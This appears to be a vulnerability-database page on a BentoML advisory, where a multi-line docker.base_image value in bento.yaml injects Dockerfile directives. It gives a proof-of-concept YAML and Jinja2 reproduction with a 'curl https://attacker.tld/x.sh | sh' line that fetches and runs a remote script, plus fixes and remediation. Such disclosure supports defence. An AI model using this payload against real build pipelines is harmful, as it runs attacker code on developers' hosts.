Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Lifecycle Timeline
3Blast Radius
ecosystem impact- 20 pypi packages depend on bentoml (20 direct, 0 indirect)
Ecosystem-wide dependent count for version 1.4.39.
DescriptionGitHub Advisory
The same Dockerfile template that mishandles envs[*].name (pending GHSA-w2pm-x38x-jp44) also interpolates docker.base_image raw with no escaping, newline filtering, or validation. A malicious bento.yaml with a multi-line docker.base_image value smuggles arbitrary Dockerfile directives into the generated Dockerfile, and bentoml containerize then runs docker build which executes the injected RUN directives on the victim host.
Vulnerable code
src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:38 (current main, 2026-04-28):
FROM {{ __options__base_image }} AS base-container__options__base_image resolves to DockerOptions.base_image (src/bentoml/_internal/bento/build_config.py:176):
base_image: t.Optional[str] = NoneNo validator, no converter, no newline check. The value is loaded straight from bento.yaml in src/bentoml/_internal/container/__init__.py:206 via DockerOptions(**docker_attrs) and rendered as-is.
PoC
Malicious bentofile.yaml:
docker:
base_image: |
python:3.10
RUN curl https://attacker.tld/x.sh | sh
FROM scratchMinimal reproduction of the unsafe interpolation:
from jinja2 import Environment
env = Environment()
malicious = 'python:3.10\nRUN curl https://attacker.tld/x.sh | sh\nFROM scratch'
out = env.from_string('FROM {{ __options__base_image }} AS base-container').render(__options__base_image=malicious)
print(out)Output:
FROM python:3.10
RUN curl https://attacker.tld/x.sh | sh
FROM scratch AS base-containerThree valid Dockerfile directives instead of one. The RUN curl executes during docker build. The trailing FROM scratch AS base-container provides the named build stage the rest of the template depends on, so the build proceeds without error.
Impact
Identical to GHSA-w2pm-x38x-jp44: arbitrary command execution on the victim's host during bentoml containerize of an attacker-supplied bento. Threat model is bento sharing (registry, marketplace, supply-chain handoff). The victim expects docker.base_image to be a Docker image reference, not a Dockerfile fragment.
Suggested fix
Validate DockerOptions.base_image at the config layer: reject any value containing newline characters (\n, \r) or whitespace beyond a single space-separated tag. A regex like ^[A-Za-z0-9._/-]+(:[A-Za-z0-9._-]+)?(@sha256:[a-f0-9]{64})?$ covers the practical Docker reference format.
The same hardening should be extended to other unvalidated fields interpolated raw in base_v2.j2:
__options__build_include[*]at line 97 (COPY ... ./src/{{ name }} ./src/{{ name }}) - same newline-injection class for path entries fromImage.build_include(*file_paths).bento__user,bento__uid_gid,bento__path,bento__home,bento__entrypoint- currently sourced from server-side defaults but should be defended in depth if they ever become user-overridable throughoverride_bento_env.
References
- Pending sibling: GHSA-w2pm-x38x-jp44 (envs[*].name), itself a sibling-fix-bypass of CVE-2026-33744 / CVE-2026-35043.
- CWE-78: https://cwe.mitre.org/data/definitions/78.html
AnalysisAI
Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.
Technical ContextAI
BentoML is a Python ML model serving framework that generates Docker containers from bento packages. The vulnerability exists in the Jinja2 template 'base_v2.j2' at line 38, which renders 'FROM {{ __options__base_image }} AS base-container' without input sanitization. The base_image field is loaded from user-supplied bento.yaml via DockerOptions dataclass (build_config.py:176) with no pydantic validator or newline filtering. Jinja2 templates perform text interpolation without escaping Dockerfile control characters. Multi-line YAML values (using | or > syntax) preserve newlines, allowing attackers to inject additional Dockerfile directives. The CWE-78 (OS Command Injection) classification applies because docker build executes the resulting Dockerfile's RUN commands on the host OS. This is a template injection variant targeting infrastructure-as-code rather than web contexts.
RemediationAI
Upgrade to BentoML 1.4.39 or later immediately via 'pip install --upgrade bentoml>=1.4.39'. The patch adds input validation to reject newline characters in docker.base_image and related configuration fields. If immediate upgrade is not feasible, implement these compensating controls with noted trade-offs: (1) Code review all bento.yaml files before containerization - blocks automation, adds manual overhead, prone to human error missing obfuscated newlines. (2) Use an allowlist of approved base images in CI/CD via pre-commit hook or linter that rejects any base_image value containing \n or \r characters - partial protection but bypassable via Unicode normalization attacks. (3) Run 'bentoml containerize' only in isolated ephemeral containers or VMs with no network access and disposable filesystems - mitigates impact but adds infrastructure complexity and breaks caching workflows. None of these workarounds provide equivalent security to patching. Vendor advisory with technical details: https://github.com/bentoml/BentoML/security/advisories/GHSA-78f9-r8mh-4xm2. Verify patch installation by checking installed version matches fixed release.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-32610
GHSA-78f9-r8mh-4xm2